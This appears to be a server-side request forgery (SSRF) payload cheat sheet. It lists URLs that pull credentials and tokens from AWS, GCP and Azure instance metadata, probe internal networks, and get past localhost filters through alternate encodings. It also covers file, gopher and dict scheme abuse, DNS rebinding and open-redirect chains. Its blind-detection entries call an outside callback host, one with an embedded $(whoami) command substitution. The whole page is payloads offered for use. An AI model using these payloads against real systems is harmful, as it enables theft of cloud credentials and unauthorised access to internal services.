SSRF Payloads - Th3L4ughingM4n

☁️ Cloud Metadata

AWS Metadata

Access AWS EC2 instance metadata and credentials

AWS http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/ http://169.254.169.254/latest/user-data http://169.254.169.254/latest/dynamic/instance-identity/document

Google Cloud Metadata

Access GCP instance metadata and service account tokens

GCP http://metadata.google.internal/computeMetadata/v1/ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token http://metadata/computeMetadata/v1/instance/attributes/ssh-keys?alt=json

Azure Metadata

Access Azure instance metadata and OAuth tokens

Azure http://169.254.169.254/metadata/instance?api-version=2021-02-01 http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/

🌐 Internal Network

Network Scanning

Scan internal network resources and services

http://localhost/admin http://127.0.0.1:8080/ http://192.168.1.1/ http://10.0.0.1/ http://172.16.0.1/

Localhost Bypass

Techniques to bypass localhost/127.0.0.1 filters

http://127.1/ http://0.0.0.0/ http://[::1]/ http://127.0.0.1.xip.io/ http://2130706433/ http://0x7f000001/

🔗 Protocol Abuse

Alternative Schemes

Use alternative protocols and URL schemes

file:///etc/passwd dict://127.0.0.1:11211/ gopher://127.0.0.1:25/ ftp://internal.host/

DNS Rebinding

Time-based DNS cache poisoning attacks

http://callback.l4ughingm4n.dev/

Configure DNS to return public IP initially, then 127.0.0.1 after TTL expires

🎯 Advanced Techniques

SSRF via Open Redirect

Chain open redirect vulnerabilities with SSRF

http://trusted-site.com/redirect?url=http://169.254.169.254/latest/meta-data/ http://target.com/api?url=http://attacker.com/redirect.php?url=http://localhost/admin

Blind SSRF Detection

Detect SSRF vulnerabilities via external callbacks

http://callback.l4ughingm4n.dev/ssrf https://callback.l4ughingm4n.dev/$(whoami)